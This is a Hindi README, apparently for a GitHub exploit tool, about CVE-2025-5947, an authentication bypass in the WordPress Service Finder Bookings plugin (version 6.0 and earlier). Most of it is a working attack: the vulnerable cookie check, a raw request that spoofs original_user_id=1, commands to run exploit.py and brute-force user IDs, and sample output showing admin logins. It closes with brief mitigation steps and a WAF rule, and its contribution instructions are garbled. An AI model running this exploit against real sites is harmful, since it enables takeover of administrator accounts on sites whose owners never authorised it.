
CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 शोषण
CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 Exploit
WordPress Service Finder Bookings ≤ 6.0 प्लगइन में प्रमाणीकरण बायपास दोष के लिए एक्सप्लॉइट टूल
Service Finder Bookings WordPress प्लगइन के संस्करण 6.0 और उससे पहले के संस्करणों में एक गंभीर प्रमाणीकरण बायपास दोष पाया गया है।
बिना प्रमाणीकरण वाले हमलावर:
service_finder_switch_back() फ़ंक्शन में अपर्याप्त कुकी सत्यापन है:
// असुरक्षित कोड
if(isset($_COOKIE['original_user_id'])) {
$user_id = $_COOKIE['original_user_id'];
wp_set_current_user($user_id);
// कोई सत्यापन नहीं!
}
GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
Host: target.com
Cookie: original_user_id=1
हमले की विशेषताएँ:
git clone https://github.com/xxconi/CVE-2025-5947.git
cd CVE-2025-5947
pip install -r requirements.txt
python exploit.py -u http://target.com
# सहायता दिखाएँ
python exploit.py -h
# व्यवस्थापक (ID=1) के रूप में लॉगिन करने का प्रयास करें
python exploit.py -u http://target.com
# विशिष्ट उपयोगकर्ता ID के साथ
python exploit.py -u http://target.com -i 5
# ब्रूट फ़ोर्स (ID 1-10)
python exploit.py -u http://target.com -b 1-10
# SSL सत्यापन के बिना
python exploit.py -u http://target.com --no-ssl-verify
# कस्टम टाइमआउट के साथ
python exploit.py -u http://target.com -t 30
python exploit.py -u http://wordpress.local
आउटपुट:
============================================================
CVE-2025-5947 Service Finder Bookings Exploit
Authentication Bypass via Cookie Spoofing
============================================================
✅ Service Finder Bookings प्लगइन मिला
🔍 उपयोगकर्ता ID 1 के साथ लॉगिन प्रयास किया जा रहा है...
📊 HTTP Status: 302
📋 प्रतिक्रिया हेडर:
Location: http://wordpress.local/wp-admin/
Set-Cookie: wordpress_logged_in_abc123=...
✅ सफल! व्यवस्थापक के रूप में लॉगिन किया गया!
📍 रीडायरेक्ट: http://wordpress.local/wp-admin/
python exploit.py -u http://target.com -b 1-20
आउटपुट:
🔄 ब्रूट फ़ोर्स शुरू (20 उपयोगकर्ता)...
✅ उपयोगकर्ता ID 1: सफल
❌ उपयोगकर्ता ID 2: असफल
✅ उपयोगकर्ता ID 3: सफल
...
✅ सफल उपयोगकर्ता: [1, 3, 5]
python exploit.py -u https://target.com --no-ssl-verify
सफल एक्सप्लॉइट में निम्नलिखित संकेतक शामिल हैं:
✅ HTTP 301 या 302 प्रतिक्रिया कोड
✅ Location हेडर में /wp-admin/ का होना
✅ Set-Cookie हेडर में wordpress_logged_in_ का होना
यह उपकरण केवल:
उपयोग किया जाना चाहिए। लेखक जिम्मेदार नहीं है।
तत्काल अपडेट
# WordPress व्यवस्थापक पैनल से अपडेट करें
# या WP-CLI के साथ
wp plugin update sf-booking
प्लगइन को निष्क्रिय करें
wp plugin deactivate sf-booking
प्लगइन हटाएँ
wp plugin delete sf-booking
वेब एप्लिकेशन फ़ायरवॉल (WAF)
Block: /wp-admin/admin-ajax.php?action=service_finder_switch_back
सुरक्षा जाँच
त्रुटियों की रिपोर्ट करने या सुधार सुझाने के लिए:
git checkout -b feature/improvement)git commit -am 'Add improvement')git push origin feature/improvement)MIT License - विवरण के लिए LICENSE फ़ाइल देखें
सुरक्षा शोधकर्ता
⭐ यदि उपयोगी लगे, तो स्टार दें!
| विशेषता | मान |
|---|
| CVE ID | CVE-2025-5947 |
| प्लगइन | Service Finder Bookings (sf-booking) |
| प्रभावित संस्करण | ≤ 6.0 |
| गंभीरता | 🔴 गंभीर |
| CVSS स्कोर | 9.8 |
| CWE | CWE-639 (प्राधिकरण बायपास) |
| EPSS स्कोर | 0.617 (98.357 प्रतिशतक) |
| प्रकाशन तिथि | 2025 |
| पैरामीटर | संक्षिप्त नाम | विवरण | डिफ़ॉल्ट |
|---|
--url | -u | लक्ष्य URL (अनिवार्य) | - |
--user-id | -i | उपयोगकर्ता ID | 1 |
--brute-force | -b | ब्रूट फ़ोर्स रेंज (1-10) | - |
--no-ssl-verify | - | SSL सत्यापन अक्षम करें | False |
--timeout | -t | अनुरोध टाइमआउट (सेकंड) | 10 |